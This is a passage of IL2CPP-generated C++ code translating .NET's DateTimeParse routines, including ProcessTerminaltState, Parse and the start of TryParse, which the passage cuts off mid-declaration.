DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_23 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_24 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_25 = DateTimeParse_GetDayOfYMN_m2E7DC88AEE18C162381DCC0F93043848A21B8B74((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_22, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_23, L_24, /*hidden argument*/NULL); if (L_25) { goto IL_015e; } } { return (bool)0; } IL_00bd: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_26 = ___result1; int32_t* L_27 = ___styles2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_26, (int32_t*)L_27, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_28 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_29 = ___result1; int32_t* L_30 = L_29->get_address_of_Year_0(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_31 = ___raw3; int32_t* L_32 = L_31->get_address_of_month_2(); bool L_33 = DateTimeFormatInfo_YearMonthAdjustment_mEEF9F16403B844B1E733A88933C24281813EAC92(L_28, (int32_t*)L_30, (int32_t*)L_32, (bool)1, /*hidden argument*/NULL); if (L_33) { goto IL_00e9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_34 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_34, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00e9: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_35 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_36 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_37 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_38 = DateTimeParse_GetHebrewDayOfNM_m4F9314601978E136AD77DBC5D9434C5D360A67FC((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_35, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_36, L_37, /*hidden argument*/NULL); if (L_38) { goto IL_015e; } } { return (bool)0; } IL_00f6: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_39 = ___dtfi4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_40 = ___raw3; int32_t* L_41 = L_40->get_address_of_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_42 = ___raw3; int32_t* L_43 = L_42->get_address_of_month_2(); bool L_44 = DateTimeFormatInfo_YearMonthAdjustment_mEEF9F16403B844B1E733A88933C24281813EAC92(L_39, (int32_t*)L_41, (int32_t*)L_43, (bool)1, /*hidden argument*/NULL); if (L_44) { goto IL_011b; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_45 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_45, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_011b: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_46 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_47 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_48 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_49 = DateTimeParse_GetDayOfYM_m7ED25D38684B48D3985BF08AA31115253AF47805((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_46, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_47, L_48, /*hidden argument*/NULL); if (L_49) { goto IL_015e; } } { return (bool)0; } IL_0128: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_50 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_51 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_52 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_53 = DateTimeParse_GetTimeOfN_m4240DB94AC85D67E2F15D3E01695908C5EF94075(L_50, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_51, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_52, /*hidden argument*/NULL); if (L_53) { goto IL_015e; } } { return (bool)0; } IL_0135: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_54 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_55 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_56 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_57 = DateTimeParse_GetTimeOfNN_m8F29F972206C71BAA5EB4721AB5CAC6ACC987A02(L_54, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_55, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_56, /*hidden argument*/NULL); if (L_57) { goto IL_015e; } } { return (bool)0; } IL_0142: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_58 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_59 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_60 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_61 = DateTimeParse_GetTimeOfNNN_m59D4D7BB0B637B9E549B9F91C0D7B96EE25BEABF(L_58, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_59, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_60, /*hidden argument*/NULL); if (L_61) { goto IL_015e; } } { return (bool)0; } IL_014f: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_62 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_62, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_015e: { int32_t L_63 = ___dps0; if ((((int32_t)L_63) <= ((int32_t)((int32_t)20)))) { goto IL_016a; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_64 = ___raw3; L_64->set_numCount_1(0); } IL_016a: { return (bool)1; } } // System.Boolean System.DateTimeParse::ProcessTerminaltState(System.DateTimeParse/DS,System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ProcessTerminaltState_mDEE6B5911737D96C89B9AA5749F4A8CB86EA838D (int32_t ___dps0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, int32_t* ___styles2, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw3, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ProcessTerminaltState_mDEE6B5911737D96C89B9AA5749F4A8CB86EA838D_MetadataUsageId); s_Il2CppMethodInitialized = true; } bool V_0 = false; { V_0 = (bool)1; int32_t L_0 = ___dps0; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_0, (int32_t)((int32_t)21)))) { case 0: { goto IL_0058; } case 1: { goto IL_0068; } case 2: { goto IL_0077; } case 3: { goto IL_0087; } case 4: { goto IL_0097; } case 5: { goto IL_00a6; } case 6: { goto IL_0111; } case 7: { goto IL_011b; } case 8: { goto IL_0125; } case 9: { goto IL_00ad; } case 10: { goto IL_00c5; } case 11: { goto IL_00d1; } case 12: { goto IL_00dd; } case 13: { goto IL_00e9; } case 14: { goto IL_00f5; } case 15: { goto IL_0101; } case 16: { goto IL_010d; } case 17: { goto IL_00b9; } } } { goto IL_012f; } IL_0058: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_1 = ___result1; int32_t* L_2 = ___styles2; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_5 = DateTimeParse_GetDayOfNN_m98D15515975E0B06429DEDCAF14D3083001ADCA0((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_1, (int32_t*)L_2, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_3, L_4, /*hidden argument*/NULL); V_0 = L_5; goto IL_012f; } IL_0068: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_9 = DateTimeParse_GetDayOfNNN_m7DC4B139DB3853458A7854D87E5B9527E0E08E56((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_6, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_7, L_8, /*hidden argument*/NULL); V_0 = L_9; goto IL_012f; } IL_0077: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_10 = ___result1; int32_t* L_11 = ___styles2; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_12 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_14 = DateTimeParse_GetDayOfMN_mA62FE28EDFF83EFD1466C867547B576DC8E68620((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_10, (int32_t*)L_11, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_12, L_13, /*hidden argument*/NULL); V_0 = L_14; goto IL_012f; } IL_0087: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result1; int32_t* L_16 = ___styles2; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_17 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_18 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_19 = DateTimeParse_GetDayOfNM_mB0820186EBFA26130280E286785383C03A8C7277((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_15, (int32_t*)L_16, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_17, L_18, /*hidden argument*/NULL); V_0 = L_19; goto IL_012f; } IL_0097: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_20 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_21 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_22 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_23 = DateTimeParse_GetDayOfMNN_m7D023A76508B02690AA381F1808836EFC86B3374((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_20, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_21, L_22, /*hidden argument*/NULL); V_0 = L_23; goto IL_012f; } IL_00a6: { V_0 = (bool)1; goto IL_012f; } IL_00ad: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_24 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_25 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_26 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_GetDayOfYNN_m60CC9772F4E33623D3ADA795C58851E23EA490E7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_24, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_25, L_26, /*hidden argument*/NULL); V_0 = L_27; goto IL_012f; } IL_00b9: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_29 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_30 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_31 = DateTimeParse_GetDayOfNNY_mD619397E2B7F801D2F569CA91D5878742C2FD825((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_28, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_29, L_30, /*hidden argument*/NULL); V_0 = L_31; goto IL_012f; } IL_00c5: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_33 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_34 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_35 = DateTimeParse_GetDayOfYMN_m2E7DC88AEE18C162381DCC0F93043848A21B8B74((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_32, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_33, L_34, /*hidden argument*/NULL); V_0 = L_35; goto IL_012f; } IL_00d1: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_36 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_37 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_38 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_39 = DateTimeParse_GetDayOfYN_m0AE142EC90410897271ECB3ACBA4D62466DF5436((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_36, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_37, L_38, /*hidden argument*/NULL); V_0 = L_39; goto IL_012f; } IL_00dd: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_40 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_41 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_42 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_43 = DateTimeParse_GetDayOfYM_m7ED25D38684B48D3985BF08AA31115253AF47805((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_40, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_41, L_42, /*hidden argument*/NULL); V_0 = L_43; goto IL_012f; } IL_00e9: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_44 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_45 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_46 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_47 = DateTimeParse_GetTimeOfN_m4240DB94AC85D67E2F15D3E01695908C5EF94075(L_44, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_45, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_46, /*hidden argument*/NULL); V_0 = L_47; goto IL_012f; } IL_00f5: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_48 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_49 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_50 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_51 = DateTimeParse_GetTimeOfNN_m8F29F972206C71BAA5EB4721AB5CAC6ACC987A02(L_48, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_49, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_50, /*hidden argument*/NULL); V_0 = L_51; goto IL_012f; } IL_0101: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_52 = ___dtfi4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_53 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_54 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_55 = DateTimeParse_GetTimeOfNNN_m59D4D7BB0B637B9E549B9F91C0D7B96EE25BEABF(L_52, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_53, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_54, /*hidden argument*/NULL); V_0 = L_55; goto IL_012f; } IL_010d: { V_0 = (bool)1; goto IL_012f; } IL_0111: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_56 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_57 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_58 = DateTimeParse_GetDateOfDSN_m391AABD326E77DA46D71FE1ACCF1C8FCABA4824C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_56, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_57, /*hidden argument*/NULL); V_0 = L_58; goto IL_012f; } IL_011b: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_59 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_60 = ___raw3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_61 = DateTimeParse_GetDateOfNDS_m66C24ADF6167A1B0779C0436ED3CBCD602EBEBBB((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_59, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_60, /*hidden argument*/NULL); V_0 = L_61; goto IL_012f; } IL_0125: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_62 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_63 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_64 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_65 = DateTimeParse_GetDateOfNNDS_m1390DC4CE0E6333945D7BD08F124AA0415A700B6((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_62, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_63, L_64, /*hidden argument*/NULL); V_0 = L_65; } IL_012f: { bool L_66 = V_0; if (L_66) { goto IL_0134; } } { return (bool)0; } IL_0134: { int32_t L_67 = ___dps0; if ((((int32_t)L_67) <= ((int32_t)((int32_t)20)))) { goto IL_0140; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_68 = ___raw3; L_68->set_numCount_1(0); } IL_0140: { return (bool)1; } } // System.DateTime System.DateTimeParse::Parse(System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A (String_t* ___s0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t ___styles2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB V_0; memset(&V_0, 0, sizeof(V_0)); { il2cpp_codegen_initobj((&V_0), sizeof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB )); DateTimeResult_Init_m6CA70DCCC2BF43E42B46A3275082E2E89726869D((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)(&V_0), /*hidden argument*/NULL); String_t* L_0 = ___s0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_1 = ___dtfi1; int32_t L_2 = ___styles2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_3 = DateTimeParse_TryParse_m007A28D9FA0561EB92C3DD2D22D293980E15DBB0(L_0, L_1, L_2, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)(&V_0), /*hidden argument*/NULL); if (!L_3) { goto IL_0022; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB L_4 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_5 = L_4.get_parsedDate_11(); return L_5; } IL_0022: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); Exception_t * L_6 = DateTimeParse_GetDateTimeParseException_m26091CD2EBBFFEA867F71D3910742714FF38F733((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)(&V_0), /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_6, NULL, DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A_RuntimeMethod_var); } } // System.Boolean System.DateTimeParse::TryParse(System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryParse_m007A28D9FA0561EB92C3DD2D22D293980E15DBB0 (String_t* ___s0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t ___styles2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_TryParse_m007A28D9FA0561EB92C3DD2D22D293980E15DBB0_MetadataUsageId); s_Il2CppMethodInitialized = true; } DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 V_0; memset(&V_0, 0, sizeof(V_0)); int32_t V_1 = 0; bool V_2 = false; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 V_3; memset(&V_3, 0, sizeof(V_3)); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E V_4; memset(&V_4, 0, sizeof(V_4)); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 V_5; memset(&V_5, 0, sizeof(V_5)); bool V_6 = false; int32_t* V_7 = NULL; bool V_8 = false; int32_t V_9 = 0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B30_0 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B29_0 = NULL; int32_t G_B31_0 = 0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B31_1 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B34_0 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B33_0 = NULL; int32_t G_B35_0 = 0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B35_1 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B38_0 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B37_0 = NULL; int32_t G_B39_0 = 0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B39_1 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B42_0 = NULL; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B41_0 = NULL; int32_t G_B43_0 = 0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * G_B43_1 = NULL; int32_t G_B64_0 = 0; { String_t* L_0 = ___s0; if (L_0) { goto IL_0017; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_1 = ___result3; DateTimeResult_SetFailure_m718CC7D41E722D8310669F2E8788E30B8B5AA184((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_1, 1, _stringLiteralF81B4F09A85F55DDC3FFCA77898383A75640AA15, NULL, _stringLiteralA0F1490A20D0211C997B44BC357E1972DEAB8AE3, /*hidden argument*/NULL); return (bool)0; } IL_0017: { String_t* L_2 = ___s0; int32_t L_3 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_2, /*hidden argument*/NULL); if (L_3) { goto IL_002e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_4 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_4, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_002e: { V_1 = 0; V_2 = (bool)0; il2cpp_codegen_initobj((&V_3), sizeof(DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 )); (&V_3)->set_suffix_1(((int32_t)256)); il2cpp_codegen_initobj((&V_4), sizeof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E )); int8_t* 